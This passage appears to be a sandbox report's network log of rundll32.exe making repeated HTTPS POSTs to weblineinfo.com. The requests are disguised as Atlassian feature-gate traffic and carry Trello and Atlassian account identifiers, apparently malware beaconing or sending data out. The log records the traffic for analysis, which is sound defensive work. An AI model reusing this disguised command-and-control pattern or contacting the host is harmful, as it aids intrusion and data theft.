    Aug 9, 2024 16:18:15.354495049 CEST49718443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:15.354521990 CEST4434971862.192.173.45192.168.2.5
    Aug 9, 2024 16:18:21.520209074 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:21.520256042 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:21.520337105 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:21.520626068 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:21.520638943 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:22.025659084 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:22.025780916 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:22.026439905 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:22.026449919 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:22.027864933 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:22.027870893 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:22.292073011 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:22.292159081 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:22.292165995 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:22.292210102 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:22.292526007 CEST49719443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:22.292551994 CEST4434971962.192.173.45192.168.2.5
    Aug 9, 2024 16:18:45.414813042 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:45.414865971 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:45.414961100 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:45.415298939 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:45.415313005 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:45.943075895 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:45.943238020 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:45.943749905 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:45.943777084 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:45.945080042 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:45.945086002 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:46.188576937 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:46.188649893 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:46.188664913 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:46.188705921 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:46.188868999 CEST49720443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:46.188886881 CEST4434972062.192.173.45192.168.2.5
    Aug 9, 2024 16:18:47.324651003 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:47.324703932 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:47.324796915 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:47.325635910 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:47.325651884 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:47.843672991 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:47.843822956 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:47.844281912 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:47.844290018 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:47.845633984 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:47.845638990 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:48.089622021 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:48.089704037 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:18:48.089730978 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:48.091041088 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:48.091041088 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:48.400741100 CEST49721443192.168.2.562.192.173.45
    Aug 9, 2024 16:18:48.400773048 CEST4434972162.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.222328901 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.222383022 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.222477913 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.222702980 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.222721100 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.737983942 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.741072893 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.741518974 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.741533995 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.742857933 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.742865086 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.982789993 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.982887983 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:07.982985973 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.982985973 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.983222008 CEST49722443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:07.983242989 CEST4434972262.192.173.45192.168.2.5
    Aug 9, 2024 16:19:09.128716946 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:09.128766060 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:09.128865957 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:09.129190922 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:09.129206896 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:09.638194084 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:09.638345003 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:09.639024973 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:09.639039993 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:09.640430927 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:09.640455008 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:10.809541941 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:10.809617043 CEST4434972362.192.173.45192.168.2.5
    Aug 9, 2024 16:19:10.809679985 CEST49723443192.168.2.562.192.173.45
    Aug 9, 2024 16:19:10.809751987 CEST49723443192.168.2.562.192.173.45
    TimestampSource PortDest PortSource IPDest IP
    Aug 9, 2024 16:17:10.349375963 CEST5451053192.168.2.51.1.1.1
    Aug 9, 2024 16:17:10.367651939 CEST53545101.1.1.1192.168.2.5
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Aug 9, 2024 16:17:10.349375963 CEST192.168.2.51.1.1.10x4486Standard query (0)weblineinfo.comA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Aug 9, 2024 16:17:10.367651939 CEST1.1.1.1192.168.2.50x4486No error (0)weblineinfo.com62.192.173.45A (IP address)IN (0x0001)false
    • weblineinfo.com
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.54970462.192.173.454433480C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:17:11 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 735
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:11 UTC735OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 61 32 38 63 32 33 39 32 66 61 35 65 35 65 39 66 35 61 30 31 38 36 36 65 31 64 65 36 32 38 66 34 36 37 62 35 39 38 33 31 63 32 30 62 36 61 30 37 31 32 65 39 37 31 64 63 32 37 63 31 64 31 62 61 62 62 66 64 66 34
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258fa28c2392fa5e5e9f5a01866e1de628f467b59831c20b6a0712e971dc27c1d1babbfdf4
    2024-08-09 14:17:11 UTC303INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 519
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:11 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:11 UTC519INData Raw: 7b 22 65 78 70 65 72 69 6d 65 6e 74 56 61 6c 75 65 73 22 3a 7b 22 66 65 61 74 75 72 65 5f 67 61 74 65 73 22 3a 7b 22 33 38 36 38 37 38 33 33 38 34 22 3a 7b 22 6e 61 6d 65 22 3a 22 37 34 39 32 37 37 35 32 33 33 39 32 22 2c 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 6d 4a 7a 68 7a 77 70 4b 4c 37 48 64 4c 52 6f 63 61 71 4d 77 55 3a 31 30 30 2e 30 30 3a 33 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65 78 70 6f 73 75 72 65 73 22 3a 5b 5d 7d 7d 2c 22 64 79 6e 61 6d 69 63 5f 63 6f 6e 66 69 67 73 22 3a 7b 22 34 32 30 30 33 32 38 38 31 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 34 32 30 30 33 32 38 38 31 30 22 2c 22 76 61 6c 75 65 22 3a 7b 7d 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 72 65 73 74 61 72 74 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65
    Data Ascii: {"experimentValues":{"feature_gates":{"3868783384":{"name":"749277523392","value":true,"rule_id":"pmJzhzwpKL7HdLRocaqMwU:100.00:3","secondary_exposures":[]}},"dynamic_configs":{"4200328810":{"name":"4200328810","value":{},"rule_id":"prestart","secondary_e


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.54970562.192.173.454433480C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:17:12 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:12 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:17:12 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:12 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:12 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    2192.168.2.54970662.192.173.454436112C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:17:17 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 735
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:17 UTC735OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 61 32 38 63 32 33 39 32 66 61 35 65 35 65 39 66 35 61 30 31 38 36 36 65 31 64 65 36 32 38 66 34 36 37 62 35 39 38 33 31 63 32 30 62 36 61 30 37 31 32 65 39 37 31 64 63 32 37 63 31 64 31 62 61 62 62 66 64 66 34
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258fa28c2392fa5e5e9f5a01866e1de628f467b59831c20b6a0712e971dc27c1d1babbfdf4
    2024-08-09 14:17:17 UTC303INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 519
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:17 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:17 UTC519INData Raw: 7b 22 65 78 70 65 72 69 6d 65 6e 74 56 61 6c 75 65 73 22 3a 7b 22 66 65 61 74 75 72 65 5f 67 61 74 65 73 22 3a 7b 22 33 38 36 38 37 38 33 33 38 34 22 3a 7b 22 6e 61 6d 65 22 3a 22 37 34 39 32 37 37 35 32 33 33 39 32 22 2c 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 6d 4a 7a 68 7a 77 70 4b 4c 37 48 64 4c 52 6f 63 61 71 4d 77 55 3a 31 30 30 2e 30 30 3a 33 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65 78 70 6f 73 75 72 65 73 22 3a 5b 5d 7d 7d 2c 22 64 79 6e 61 6d 69 63 5f 63 6f 6e 66 69 67 73 22 3a 7b 22 34 32 30 30 33 32 38 38 31 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 34 32 30 30 33 32 38 38 31 30 22 2c 22 76 61 6c 75 65 22 3a 7b 7d 2c 22 72 75 6c 65 5f 69 64 22 3a 22 70 72 65 73 74 61 72 74 22 2c 22 73 65 63 6f 6e 64 61 72 79 5f 65
    Data Ascii: {"experimentValues":{"feature_gates":{"3868783384":{"name":"749277523392","value":true,"rule_id":"pmJzhzwpKL7HdLRocaqMwU:100.00:3","secondary_exposures":[]}},"dynamic_configs":{"4200328810":{"name":"4200328810","value":{},"rule_id":"prestart","secondary_e


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    3192.168.2.54970762.192.173.454436112C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:17:18 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:18 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:17:18 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:18 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:18 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    4192.168.2.54971562.192.173.454433480C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:17:40 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:40 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:17:40 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:40 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:40 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    5192.168.2.54971662.192.173.454436112C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:17:54 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:17:54 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:17:54 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:17:54 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:17:54 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    6192.168.2.54971862.192.173.454433480C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:18:15 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:15 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:18:15 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:15 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:15 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    7192.168.2.54971962.192.173.454436112C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:18:22 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
